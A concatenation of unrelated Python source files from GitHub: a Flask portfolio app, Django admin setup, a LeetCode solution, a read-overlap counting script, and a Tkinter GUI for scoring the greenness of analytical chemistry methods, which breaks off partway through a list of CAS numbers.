| trung-hn/Project-Euler | Solution/prob37.py | prob37.py | py | 1,089 | python | en | code | 1 | github-code | 36 |
37071867440 | from flask import Flask,render_template,redirect,url_for
from flask_bootstrap import Bootstrap
from detail_collector import DetailCollector
app = Flask(__name__)
app.config['Secret_KEY'] = '83hs293C0926jcw2FJ893Bd3E'
Bootstrap(app)
detail = DetailCollector()
@app.route("/")
@app.route("/home")
def home():
return render_template('index.html',details = detail)
| Amari-17/portfolio | app.py | app.py | py | 370 | python | en | code | 0 | github-code | 36 |
14263045240 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import Account, UserProfile, RefundRequests, FavoriteItem, Preferences
# Register your models here.
class AccountAdmin(UserAdmin):
list_display = ('email', 'first_name', 'last_name', 'username', 'phone_number', 'last_login', 'date_joined', 'is_active')
list_per_page = 60
filter_horizontal = ()
list_filter = ()
fieldsets = ()
ordering = ('date_joined',)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ('user', 'city', 'district', 'province', 'country')
list_per_page = 30
class PreferencesAdmin(admin.ModelAdmin):
list_display = ('user', 'product', 'rating')
list_per_page = 30
class RefundRequestsAdmin(admin.ModelAdmin):
list_display = ('user', 'order_number', 'amount_paid','processed','created_at')
list_editable = ('processed',)
list_per_page = 30
admin.site.register(Account,AccountAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(RefundRequests, RefundRequestsAdmin)
admin.site.register(FavoriteItem)
admin.site.register(Preferences,PreferencesAdmin) | jeffjcb/southcartel-app | southcartel/accounts/admin.py | admin.py | py | 1,150 | python | en | code | 1 | github-code | 36 |
70894649064 | from queue import PriorityQueue
class Solution:
def splitNum(self, num: int) -> int:
a=[int(x) for x in str(num)]
pq=PriorityQueue()
num1=""
num2=""
for i in a:
pq.put(i)
while not pq.empty():
num1+=str(pq.get())
if not pq.empty():
num2+=str(pq.get())
return int(num1)+int(num2)
| VanshBhargava/Leetcode-Biweekly-Contest-99-Solutions | Split with minimum Sum.py | Split with minimum Sum.py | py | 421 | python | en | code | 1 | github-code | 36 |
32901525311 | import csv
import itertools
import os.path
import sys
if __name__ == "__main__":
#Create ontology dictionary from MEGARes ontology file
#megares_ontology = {}
#ontology_filename = "/home/noyes046/jsettle/argmobrich/MEGARESONTOLOGY.tsv"
#with open(ontology_filename, 'r') as ontology_tsv:
#ontology_reader = csv.reader(ontology_tsv, delimiter='\t')
#for row in ontology_reader:
##Skip column names
#if row[0] == "header":
#continue
#
##FIll in our dict
#megares_ontology[row[0]] = { "class" : row[1],
#"mechanism" : row[2],
#"group" : row[3]
#}
#Go through colocalization results, looking for overlaps
results_filename = sys.argv[1]
overlap_dict ={}
tmp_overlaps = []
with open(results_filename, 'r') as results_csv:
results_reader = csv.reader(results_csv, delimiter='\t')
for row in results_reader:
#Skip column names
if row[0] == "SAMPLE_TYPE":
continue
if row[18] == "No":
#If there were overlaps, record them
if len(tmp_overlaps) > 1:
overlaps_processed = []
for overlap in itertools.product(tmp_overlaps, repeat=2):
#Not interested in alignments to same read
if overlap[0] == overlap[1]:
continue
#(A,B) = (B,A) for this purpose
if (tuple(sorted(overlap)) in overlaps_processed):
continue
if overlap in overlap_dict:
overlap_dict[overlap] += 1
else:
overlap_dict[overlap] = 1
overlaps_processed.append(tuple(sorted(overlap)))
tmp_overlaps = [row[11]]
else: #(row[16] == "Yes")
tmp_overlaps.append(row[11])
sorted_overlaps = sorted(overlap_dict, key = lambda overlap: overlap_dict[overlap], reverse=True)
#Write tsv for overlap counts
with open(os.path.splitext(os.path.basename(sys.argv[1]))[0] + "_overlaps.tsv", 'w') as coloc_tsv:
coloc_writer = csv.writer(coloc_tsv, delimiter='\t')
coloc_writer.writerow([os.path.splitext(os.path.basename(sys.argv[1]))[0][:6] + " overlaps"])
coloc_writer.writerow([])
coloc_writer.writerow(["Overlap Pair", "Occurrences"])
for overlap in sorted_overlaps:
coloc_writer.writerow([overlap, overlap_dict[overlap]])
| settj/argmobrich_analysis | colocalization/gen_overlap.py | gen_overlap.py | py | 2,748 | python | en | code | 0 | github-code | 36 |
31571764321 | # _ __ _ __
# | | /| / /| | /| / / GREEN ANALYTICAL INDEX GENERATOR
# | |/ |/ / | |/ |/ / W.Wojnowski 2020
# |__/|__/ |__/|__/ v.0.3 (alpha)
#
#
from tkinter import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.colors import LinearSegmentedColormap
from tkinter import ttk
from tkinter import filedialog
import tkinter.messagebox
import webbrowser
from math import log
from fpdf import FPDF
import os
from datetime import datetime
#***************** SPLASH SCREEN *******************************
root = Tk()
# show no frame
root.overrideredirect(True)
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
root.geometry('%dx%d+%d+%d' % (width*0.5, height*0.5, width*0.1, height*0.1))
image_file = "zaprawa_klejowa.gif"
#assert os.path.exists(image_file)
# use Tkinter's PhotoImage for .gif files
image = PhotoImage(file=image_file)
canvas = Canvas(root, height=height*0.5, width=width*0.5, bg="black")
canvas.create_image(width*0.5/2, height*0.5/2, image=image)
canvas.pack()
# show the splash screen for 5000 milliseconds then destroy
root.after(5000, root.destroy)
root.mainloop()
# **************** MAIN PROGRAM *******************************
root = Tk()
# app title:
root.title('Analytical Method Green Index Calculator')
# default app size:
root.geometry('800x500')
root.minsize(800, 500)
# root.configure(bg='white')
# create the small icon in the task bar:
root.iconbitmap('PG_favicon.ico')
# *********************** Functions ****************************
def clearFrame(frame):
frame.destroy()
global rightFrame
rightFrame = Frame(root, width=300, height=450, padx=20)
rightFrame.pack(side=RIGHT)
# Image save dialog:
def saveImage():
ftypes = [('PNG file', '.png'), ('All files', '*')] #, ('JPG file', '.jpg') - seems that .jpg is not supported by some module
filename = filedialog.asksaveasfilename(filetypes=ftypes, defaultextension='.png')
# save the plot in the specified path; the 'tight' option removes the whitespace from around the figure:
plt.savefig(filename, bbox_inches='tight')
# temporary placeholder function:
def doNothing():
print("ok ok I won't...")
# create the popup window with some additional information:
def popup_bonus():
win = Toplevel()
win.wm_title("About Green Index")
win.iconbitmap('PG_favicon.ico')
def callback(event):
webbrowser.open_new(event.widget.cget("text"))
popup_label1 = Label(win, text='v. 0.1 2020 \n(c) Gdańsk University of Technology', justify=LEFT)
popup_label1.grid(row=0, column=0, padx=8, pady=8)
popup_label2 = Label(win, text=r'http://www.chem.pg.edu.pl/kcha', fg='blue', cursor='hand2', justify=LEFT)
popup_label2.grid(row=1, column=0, padx=8, pady=8)
popup_label2.bind('<Button-1>', callback)
popup_label3 = Label(win, text='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus convallis non sem ut aliquet. Praesent tempus fringilla suscipit. Phasellus tellus massa, semper et bibendum quis, rhoncus id neque. Sed euismod consectetur elit id tristique. Sed eu nibh id ante malesuada condimentum. Phasellus luctus finibus luctus. Pellentesque mi tellus, condimentum sit amet porta sit amet, ullamcorper quis elit. Pellentesque eu mollis nulla. Quisque vulputate, sem at iaculis vehicula, dui orci aliquet lectus, in facilisis odio dolor ut leo. Vivamus convallis hendrerit est luctus ornare. Nullam augue nisi, aliquam sit amet scelerisque hendrerit, pretium vel dui. Pellentesque sed tortor mollis, imperdiet quam quis, scelerisque erat. Vestibulum quis mollis dolor.',
wraplength=300, justify=LEFT, bg='white')
popup_label3.grid(row=2, column=0, padx=8, pady=8)
popup_button = Button(win, text="Close", command=win.destroy)
popup_button.grid(row=3, column=0, padx=8, pady=8)
# connect a float in range 0.0 : 1.0 to a colour in a spectrum from red to yellow to green (256 discrete colour values):
def colorMapper(value):
cmap = LinearSegmentedColormap.from_list('rg', ["red", "yellow", "green"], N=256)
mapped_color = int(value * 255)
color = cmap(mapped_color)
return color
# function for refreshing the canvas:
def destroyCanvas(canvas):
canvas.destroy()
# the final score variable:
entry_text = StringVar()
def printScore():
try:
global score
score = (var_1 * weight_1.get()
+ var_2 * weight_2.get()
+ var_3 * weight_3.get()
+ var_4 * weight_4.get()
+ var_5 * weight_5.get()
+ var_6 * weight_6.get()
+ var_7 * weight_7.get()
+ var_8 * weight_8.get()
+ var_9 * weight_9.get()
+ var_10 * weight_10.get()
+ var_11 * weight_11.get()
+ var_12 * weight_12.get())/(weight_1.get() + weight_2.get() + weight_3.get() + weight_4.get() + weight_5.get() +
weight_6.get() + weight_7.get() +
weight_8.get() + weight_9.get() + weight_10.get() + weight_11.get() + weight_12.get())
# set the final score as a text string rounded to 2 decimals:
entry_text.set(str(round(score, 2)))
print(' \n Total score: %s, rounded: %s' % (str(score), str(round(score, 2))))
print('Criteria scores:')
except NameError:
tkinter.messagebox.showerror(title='Name Error', message='Please set all 12 variables.')
# a function to refresh the chart:
def chartPlotter(event=None):
printScore(), clearFrame(rightFrame), pieChart(), print_variables()
# interface for assigning custom weights to the 12 variables:
def weightChoice(row, column, tab, weightVar):
chckbxVar = StringVar()
chckbxVar.set('disabled')
radioVar = IntVar()
radioVar.set(1)
radio_1 = ttk.Radiobutton(tab, text='1', variable=radioVar, value=1)
radio_2 = ttk.Radiobutton(tab, text='2', variable=radioVar, value=2)
radio_3 = ttk.Radiobutton(tab, text='3', variable=radioVar, value=3)
radio_4 = ttk.Radiobutton(tab, text='4', variable=radioVar, value=4)
radio_1.grid(row=row + 1, column=column, sticky='sw', padx=(70, 0))
radio_2.grid(row=row + 1, column=column, sticky='sw', padx=(100, 0))
radio_3.grid(row=row + 1, column=column, sticky='sw', padx=(130, 0))
radio_4.grid(row=row + 1, column=column, sticky='sw', padx=(160, 0))
radio_1.config(state = DISABLED)
radio_2.config(state = DISABLED)
radio_3.config(state = DISABLED)
radio_4.config(state = DISABLED)
def printRadioVar():
weightVar.set(radioVar.get())
chartPlotter()
weight_button = ttk.Button(tab, text='Set weight', command=printRadioVar)
weight_button.grid(row=row + 1, column=column, sticky='sw', padx=(190, 0))
weight_button.config(state = DISABLED)
def printCheckbox():
radios = (radio_1, radio_2, radio_3, radio_4)
if chckbxVar.get() == 'disabled':
radioVar.set(1)
weightVar.set(1)
for radio in radios:
radio.config(state = DISABLED if chckbxVar.get() == 'disabled' else NORMAL)
weight_button.config(state = DISABLED if chckbxVar.get() == 'disabled' else NORMAL)
ttk.Checkbutton(tab, text='Modify default weights', command=lambda: [printCheckbox()], variable=chckbxVar, onvalue='enabled', offvalue='disabled').grid(row=row, column=column,
columnspan=4, sticky='w', padx=8,
pady=(60, 0))
Label(tab, text='Weight: ').grid(row=row + 1, column = column, sticky='sw', padx=8)
# ********** Main menu ***********************************************************************************
menu = Menu(root)
# configure the menu:
root.config(menu=menu)
FileMenu = Menu(menu)
editMenu = Menu(menu)
# add drop-down functionality:
menu.add_cascade(label='File', menu=FileMenu)
FileMenu.add_command(label='Info', command=popup_bonus)
FileMenu.add_separator()
FileMenu.add_command(label='Save image', command=saveImage)
# FileMenu.add_command(label='Exit', command=doNothing)
# menu.add_cascade(label='Edit', menu=editMenu)
# editMenu.add_command(label='Redo', command=doNothing)
# ******** Statusbar *************
def createStatusBar():
status = ttk.Label(root, textvariable=status_string, bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
status_string = StringVar()
# status_string.trace('w', createStatusBar)
status_string.set('test test')
status = ttk.Label(root, textvariable=status_string, borderwidth=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
# status = Label(root, text=status_string.get(), bd=1, relief=SUNKEN, anchor=W)
# status.pack(side=BOTTOM, fill=X)
# ******** Two separate frames ******
leftFrame = Frame(root, bd=1, width=300, height=450)
rightFrame = Frame(root, width=300, height=450, padx=20)
bottomFrame = Frame(root, bd=1)
leftFrame.pack(side=LEFT, anchor=N)
rightFrame.pack(side=RIGHT)
bottomFrame.pack(side=BOTTOM, anchor=W)
# ************************* Tabs ***************************
# create tabs:
tab_parent = ttk.Notebook(leftFrame, height=400)
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab5 = ttk.Frame(tab_parent)
tab6 = ttk.Frame(tab_parent)
tab7 = ttk.Frame(tab_parent)
tab8 = ttk.Frame(tab_parent)
tab9 = ttk.Frame(tab_parent)
tab10 = ttk.Frame(tab_parent)
tab11 = ttk.Frame(tab_parent)
tab12 = ttk.Frame(tab_parent)
# add tabs to the tab parent:
tab_parent.add(tab1, text="1")
tab_parent.add(tab2, text="2")
tab_parent.add(tab3, text="3")
tab_parent.add(tab4, text="4")
tab_parent.add(tab5, text="5")
tab_parent.add(tab6, text="6")
tab_parent.add(tab7, text="7")
tab_parent.add(tab8, text="8")
tab_parent.add(tab9, text="9")
tab_parent.add(tab10, text="10")
tab_parent.add(tab11, text="11")
tab_parent.add(tab12, text="12")
# ****** matplotlib figure ********
weight_1 = IntVar()
weight_2 = IntVar()
weight_3 = IntVar()
weight_4 = IntVar()
weight_5 = IntVar()
weight_6 = IntVar()
weight_7 = IntVar()
weight_8 = IntVar()
weight_9 = IntVar()
weight_10 = IntVar()
weight_11 = IntVar()
weight_12 = IntVar()
weight_1.set(1)
weight_2.set(1)
weight_3.set(1)
weight_4.set(1)
weight_5.set(1)
weight_6.set(1)
weight_7.set(1)
weight_8.set(1)
weight_9.set(1)
weight_10.set(1)
weight_11.set(1)
weight_12.set(1)
# Begin with default values of variables to be able to generate the chart right away:
var_1 = 1.0
var_2 = 1.0
var_3 = 1.0
var_4 = 1.0
var_5 = 1.0
var_6 = 1.0
var_7 = 1.0
var_8 = 1.0
var_9 = 1.0
var_10 = 1.0
var_11 = 1.0
var_12 = 1.0
# function for updating the status bar:
def updateStatusBar():
global status_string
status_string.set(' scores: | (1) %s | (2) %s | (3) %s | (4) %s | (5) %s | (6) %s | (7) %s | (8) %s | (9) %s | (10) %s | (11) %s | (12) %s |'
% (str(round(var_1, 2)),
str(round(var_2, 2)),
str(round(var_3, 2)),
str(round(var_4, 2)),
str(round(var_5, 2)),
str(round(var_6, 2)),
str(round(var_7, 2)),
str(round(var_8, 2)),
str(round(var_9, 2)),
str(round(var_10, 2)),
str(round(var_11, 2)),
str(round(var_12, 2))
))
# generate the pie chart (plot) with a circle decal in the middle:
def pieChart(): #weights, labels, colors
colors = [colorMapper(var_1), colorMapper(var_2), colorMapper(var_3), colorMapper(var_4), colorMapper(var_5), colorMapper(var_6), colorMapper(var_7), colorMapper(var_8), colorMapper(var_9),
colorMapper(var_10), colorMapper(var_11), colorMapper(var_12)]
weights = [weight_1.get(), weight_2.get(), weight_3.get(), weight_4.get(), weight_5.get(), weight_6.get(), weight_7.get(), weight_8.get(), weight_9.get(), weight_10.get(), weight_11.get(),
weight_12.get()]
labels = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']
index_value = float(entry_text.get())
fig, ax = plt.subplots(figsize=(3, 3), dpi=150)
ax.clear()
ax.axis('equal')
radius = 1.0
pie2 = ax.pie(weights, radius=radius, colors=colors, labeldistance=(radius * 0.875), labels=labels,
rotatelabels=False, startangle=90, counterclock=False,
wedgeprops={"edgecolor": "black", 'linewidth': 1}, textprops={'fontsize': (radius * 10)})
plt.setp(pie2[1], rotation_mode="anchor", ha="center", va="center")
for tx in pie2[1]:
rot = tx.get_rotation()
tx.set_rotation(rot)
# if you want rotated labels:
# tx.set_rotation(rot+ 90 + (1 - rot // 180) * 180)
circle = plt.Circle(xy=(0, 0), radius=(radius * 0.75), facecolor=colorMapper(index_value), edgecolor='black',
linewidth=1)
plt.gca().add_artist(circle)
ax.text(0.5, 0.5, str(index_value),
verticalalignment='center', horizontalalignment='center',
transform=ax.transAxes,
color='black', fontsize=(radius * 40))
fig.tight_layout() # for exporting a compact figure
# Pack the figure into a canvas:
canvas = FigureCanvasTkAgg(fig, master=rightFrame) # A tk.DrawingArea.
plot_widget = canvas.get_tk_widget()
plot_widget.pack(side=TOP)
# print(weight_12.get())
# **************************************
# define a temporary function to test the printing of global variables:
def print_variables():
try:
print ('var_1: ' + str(var_1))
print('var_2: ' + str(var_2))
print('var_3: ' + str(var_3))
print('var_5: ' + str(var_5))
print('var_6: ' + str(var_6))
print('var_7: ' + str(var_7))
print('var_8: ' + str(var_8))
print('var_9: ' + str(var_9))
print('var_10: ' + str(var_10))
print('var_11: ' + str(var_11))
print('var_12: ' + str(var_12))
updateStatusBar()
except NameError:
tkinter.messagebox.showerror(title='Name error',
message='Please fill all the variables')
# generate tab captions and prompt captions:
def tab(tab_no, text1, text2):
Label(tab_no, text=text1, wraplength=300, justify=LEFT).grid(sticky='w', row=0, column=0, padx=8, pady=8)
Label(tab_no, text=text2, wraplength=300, justify=LEFT).grid(sticky='w', row=1, column=0, padx=8, pady=8)
# *****************************************************************************************************************
# TAB 1
# *****************************************************************************************************************
content_1 = tab(tab1, text1='Direct analytical techniques should be applied to avoid sample treatment.',
text2='Select the sampling procedure:')
# Create a Tkinter variable
var_1_text = StringVar(tab1)
# Dictionary with options
var_1_text_choices = {'Remote sensing without sample damage': 1.0,
'Remote sensing with little physical damage': 0.95,
'Non-invasive analysis': 0.9,
'In-field sampling and direct analysis': 0.85,
'In-field sampling and on-line analysis': 0.78,
'On-line analysis': 0.70,
'At-line analysis': 0.60,
'Off-line analysis': 0.48,
'External sample pre- and treatment and batch analysis (reduced number of steps)': 0.30,
'External sample pre- and treatment and batch analysis (large number of steps)': 0.0}
var_1_text.set('SAMPLING PROCEDURE')
dropDown_1 = OptionMenu(tab1, var_1_text, *var_1_text_choices.keys())
dropDown_1.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_1.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# on change dropdown value, get the dictionary value and modify the global variable
def change_dropdown_1(*args):
# Define the global variable for Principle 1:
global var_1
var_1 = None
var_1 = var_1_text_choices[var_1_text.get()]
print('var_1:' + str(var_1))
chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_1_text.trace('w', change_dropdown_1)
W_1 = weightChoice(10, 0, tab1, weight_1)
# *****************************************************************************************************************
# TAB 2
# *****************************************************************************************************************
content_2 = tab(tab2, text1='Minimal sample size and minimal number of samples are goals.',
text2='Enter the amount of sample in either g or mL:')
amount_var = StringVar()
amount_var.set('input')
sample_amount_entry = ttk.Entry(tab2, textvariable=amount_var, width=15)
sample_amount_entry.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# the event=None is passed so that the entry.bind does not return a positional argument
def change_entry_2(event=None):
global var_2
var_2 = None
try:
if float(amount_var.get()) > 100:
var_2 = 0
elif float(amount_var.get()) < 0.1:
var_2 = 1.0
else:
var_2 = abs(-0.142 * log(float(amount_var.get())) + 0.65) # absolute value to avoid negative values
print('var_2:' + str(var_2))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
chartPlotter()
# bind the <Return> key to the entry window, so that the function gets called as an alternative to the 'set' button:
sample_amount_entry.bind('<Return>', change_entry_2)
# insert a button that does the same:
ttk.Button(tab2, text='Set', command=change_entry_2).grid(row=2, column=0, padx=8, pady=8)
W_2 = weightChoice(10, 0, tab2, weight_2)
# *****************************************************************************************************************
# TAB 3
# *****************************************************************************************************************
content_3 = tab(tab3, 'If possible, measurements should be performed in situ.',
'What is the positioning of the analytical device?')
# Create a Tkinter variable
var_3_text = StringVar(tab3)
# Dictionary with options
var_3_text_choices = {'off-line': 0.0,
'at-line': 0.33,
'on-line': 0.66,
'in-line': 1.0}
var_3_text.set('select')
dropDown_3 = OptionMenu(tab3, var_3_text, *var_3_text_choices.keys())
dropDown_3.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_3.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# on change dropdown value, get the dictionary value and modify the global variable
def change_dropdown_3(*args):
global var_3
var_3 = None
var_3 = var_3_text_choices[var_3_text.get()]
print('var_3:' + str(var_3))
chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_3_text.trace('w', change_dropdown_3)
W_3 = weightChoice(10, 0, tab3, weight_3)
# *************************** TAB 4 ************************************************************************************
content_4 = tab(tab4, text1='Integration of analytical processes and operations saves energy and reduces the use of reagents.',
text2='How many major, distinct steps are there in the sample preparation procedure? These include e.g. sonication,'
' mineralization, centrifugation, derivatization, extraction, etc.')
var_4_text = StringVar(tab4)
# Dictionary with options
var_4_text_choices = {'3 or fewer': 1.0,
'4': 0.8,
'5': 0.6,
'6': 0.4,
'7': 0.2,
'8 or more': 0.0}
var_4_text.set('select')
dropDown_4 = OptionMenu(tab4, var_4_text, *var_4_text_choices.keys())
dropDown_4.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_4.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# on change dropdown value, get the dictionary value and modify the global variable
def change_dropdown_4(*args):
global var_4
var_4 = None
var_4 = var_4_text_choices[var_4_text.get()]
print('var_4:' + str(var_4))
chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_4_text.trace('w', change_dropdown_4)
W_4 = weightChoice(10, 0, tab4, weight_4)
# *****************************************************************************************************************
# TAB 5
# *****************************************************************************************************************
content_5 = tab(tab5, text1='Automated and miniaturized methods should be selected.', text2='Degree of automation:')
# Create a Tkinter variable
var_5a_text = StringVar(tab5)
# Dictionary with options
var_5a_text_choices = {'automatic': 1.0,
'semi-automatic': 0.5,
'manual': 0.0}
var_5a_text.set('select')
dropDown_5a = OptionMenu(tab5, var_5a_text, *var_5a_text_choices.keys())
dropDown_5a.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_5a.grid(sticky='w', row=2, column=0, padx=8, pady=8)
var_5a = DoubleVar(tab5)
var_5a.set(1.0)
var_5b = DoubleVar(tab5)
var_5b.set(1.0)
def variableFive():
global var_5
a = var_5a.get()
b = var_5b.get()
if a == 1.0 and b == 1.0:
var_5 = 1.0
elif a == 0.5 and b == 1.0:
var_5 = 0.75
elif a == 0.0 and b == 1.0:
var_5 = 0.5
elif a == 1.0 and b == 0.0:
var_5 = 0.5
elif a == 0.5 and b == 0.0:
var_5 = 0.25
elif a == 0.0 and b == 0.0:
var_5 = 0.0
# on change dropdown value, get the dictionary value and modify the global variable
def change_dropdown_5a(*args):
var_5a.set(var_5a_text_choices[var_5a_text.get()])
print('var_5a:' + str(var_5a))
variableFive()
# global var_5
# var_5 = var_5a.get() * var_5b.get()
chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_5a_text.trace('w', change_dropdown_5a)
Label(tab5, text='Sample preparation:', wraplength=300, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
var_5b_text = StringVar(tab5)
var_5b_text_choices = {'miniaturized': 1.0,
'not miniaturized': 0.0}
var_5b_text.set('select')
dropDown_5b = OptionMenu(tab5, var_5b_text, *var_5b_text_choices.keys())
dropDown_5b.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_5b.grid(sticky='w', row=4, column=0, padx=8, pady=8)
def change_dropdown_5b(*args):
var_5b.set(var_5b_text_choices[var_5b_text.get()])
# print('var_5b:' + str(var_5b))
# global var_5
# var_5 = var_5a.get() * var_5b.get()
variableFive()
print('var_5:' + str(var_5))
chartPlotter()
var_5b_text.trace('w', change_dropdown_5b)
W_5 = weightChoice(10, 0, tab5, weight_5)
# *****************************************************************************************************************
# TAB 6
# *****************************************************************************************************************
content_6 = tab(tab6, text1='Derivatization should be avoided.', text2='Select derivatization agents (if used):')
# combine the selected options into a single string to produce a label caption
def concatenate_text(list_):
caption = ''
for i in list_:
caption = caption + i + '; '
return caption
def Select():
reslist = list()
selecion = lbox.curselection()
for i in selecion:
entered = lbox.get(i)
reslist.append(entered)
global_list.append(entered)
# update the label box with selected deriv. agents:
print(reslist)
print(global_list)
v.set(concatenate_text(global_list))
global var_6
var_6 = 1.0
# add a -0.2 penaly for using derivatization agents:
for CAS in global_list:
var_6 = var_6 * lbox_list[CAS]
if var_6 > 0.2:
var_6 = var_6 - 0.2
else:
var_6 = 0.0
print(var_6)
chartPlotter()
# update the list box
def update_list(*args):
search_term = search_var.get()
lbox.delete(0, END)
for item in lbox_list.keys():
if search_term.lower() in item.lower():
lbox.insert(END, item)
# clear the selection and the displayed label caption
def clear_list():
global v, global_list
v.set('')
global var_6
var_6 = 1.0
global_list = []
chartPlotter()
# create global variables
global_list = []
# if derivatization should be avoided, then shouldn't the highest value in the case in which derivatization agents are used be lower than 1.0?
lbox_list = {
# "None": 1.1,
"5950-69-6": 1,
"30084-90-3": 1,
"12093-10-6": 1,
"6283-74-5": 1,
"119-53-9": 1,
"126-81-8": 1,
"24257-93-0": 1,
"58068-85-2": 0.949158975023003,
"1273-85-4": 0.949158975023003,
"4233-33-4": 0.949158975023003,
"100-10-7": 0.949158975023003,
"38183-12-9": 0.945068038553621,
"41468-25-1": 0.937140592655187,
"1395920-13-4": 0.937140592655187,
"521-24-4": 0.937140592655187,
"56606-21-4": 0.935584744799731,
"65-22-5": 0.925393321432741,
"68123-33-1": 0.925393321432741,
"913253-56-2": 0.913914155272091,
"124522-09-4": 0.913914155272091,
"223463-14-7": 0.902699986612441,
"1118-68-9": 0.901394170230429,
"952102-12-4": 0.901394170230429,
"536-69-6": 0.901394170230429,
"203256-20-6": 0.901394170230429,
"86516-36-1": 0.899210326049394,
"861881-76-7": 0.886368566581839,
"56139-74-3": 0.869932201280637,
"84806-27-9": 0.865490140567591,
"91366-65-3": 0.865490140567591,
"67229-93-0": 0.855427480281241,
"1273-82-1": 0.855042238169516,
"50632-57-0": 0.846792397075292,
"10199-89-0": 0.839008465483774,
"152111-91-6": 0.836037308222637,
"7149-49-7": 0.830362674910287,
"3029-19-4": 0.830362674910287,
"68572-87-2": 0.829473879117877,
"12152-94-2": 0.829473879117877,
"29270-56-2": 0.829154698457689,
"24463-19-2": 0.827803622060042,
"100-39-0": 0.825375773537705,
"550-44-7": 0.822230968349539,
" 49759-20-8": 0.822230968349539,
"38609-97-1": 0.822230968349539,
"35661-51-9": 0.822230968349539,
"10401-59-9": 0.822230968349539,
"70402-14-1": 0.822230968349539,
"131076-14-7": 0.822230968349539,
"214147-22-5": 0.822230968349539,
"4930-98-7": 0.822230968349539,
"569355-30-2": 0.822230968349539,
"53348-04-2": 0.820406195102248,
"67580-39-6": 0.818423316626862,
"68133-98-2": 0.814016502590708,
"81864-15-5": 0.814016502590708,
"113722-81-9": 0.814016502590708,
"15537-71-0": 0.809079828950995,
"33008-06-9": 0.809079828950995,
"139332-64-2": 0.809079828950995,
"62642-61-9": 0.806764775754175,
"100139-54-6": 0.806764775754175,
"62796-29-6": 0.797901423240715,
"87-13-8": 0.783298381421747,
"35231-44-8": 0.778837259389339,
"88404-25-5": 0.778837259389339,
"485-47-2": 0.77674392680131,
"58520-45-9": 0.776282830117383,
"107-91-5": 0.776282830117383,
"139332-66-4": 0.776282830117383,
"89-25-8": 0.776282830117383,
"18428-76-7": 0.776282830117383,
"20624-25-3": 0.763216179776723,
"27072-45-3": 0.762516465156704,
"1459205-36-7": 0.755628677634781,
"96483-68-0": 0.747181595887401,
"132098-76-1": 0.747181595887401,
"98-59-9": 0.746227267824334,
"7612-98-8": 0.744246233476037,
"5415-58-7": 0.742560985030801,
"76-83-5": 0.740506239181083,
"1293-79-4": 0.740506239181083,
"28920-43-6": 0.740506239181083,
"100-07-2": 0.740506239181083,
"99-73-0": 0.738962425018157,
"22265-37-8": 0.737084384687495,
"3731-51-9": 0.737084384687495,
"141903-34-6": 0.737084384687495,
"122-04-3": 0.732376041854033,
"4755-50-4": 0.732376041854033,
"99-33-2": 0.732376041854033,
"605-65-2": 0.723192330411814,
"56512-49-3": 0.723192330411814,
"126565-42-2": 0.723192330411814,
"7693-46-1": 0.721322673837572,
"1711-06-4": 0.717883414280986,
"93128-04-2": 0.717798274857161,
"613-54-7": 0.716357636495872,
"74367-78-5": 0.710065827927279,
"119-26-6": 0.692633685424727,
"2508-19-2": 0.692425832968952,
"21614-17-5": 0.682522312223409,
"80-11-5": 0.681782236352849,
"100-46-9": 0.679263084173718,
"55486-13-0": 0.666338980106273,
"16315-59-6": 0.665281844920184,
"5102-79-4": 0.664748970983542,
"70-34-8": 0.664086673111964,
"132-32-1": 0.659883743356088,
"36410-81-8": 0.659179085176979,
"100-16-3": 0.659159320154698,
"104077-15-8": 0.659091847163412,
"4083-64-1": 0.649947842697737,
"21324-39-0": 0.634865149902982,
"2978-11-2_": 0.629540812510628,
"456-27-9": 0.628988106517093,
"98-09-9": 0.628032387327697,
"103-72-0": 0.606674230911606,
"504-29-0": 0.587444277328904,
"86-84-0": 0.566544585073271,
"36877-69-7": 0.556132009449506,
"103-71-9": 0.525453097624119,
"551-06-4": 0.510591749035237,
"643-79-8": 0.486298449205041,
"98-88-4": 0.475562851988167,
"5470-11-1": 0.466906948575218,
"99-65-0": 0.414382740812551,
"95-54-5": 0.409876625997181,
"60-24-2": 0.380580959884422,
"1118-71-4": 1,
"4426-47-5": 0.98287765750619,
"35342-88-2": 0.934408589712128,
"13435-12-6": 0.934408589712128,
"122-51-0": 0.90808769546171,
"17455-13-9": 0.898290310316299,
"7449-74-3": 0.896162794934563,
"1188-33-6": 0.873968193624155,
"1133-63-7": 0.845047181007906,
"57981-02-9": 0.843544327015115,
"3449-26-1": 0.831289869514086,
"54925-64-3": 0.831289869514086,
"7453-26-1": 0.831289869514086,
"23231-91-6": 0.82477424558194,
"423-39-2": 0.821174784952006,
"3332-29-4": 0.817379220173597,
"18297-63-7": 0.804205531712304,
"13257-81-3": 0.796997494513717,
"73980-71-9": 0.796226219175859,
"828-73-9": 0.796226219175859,
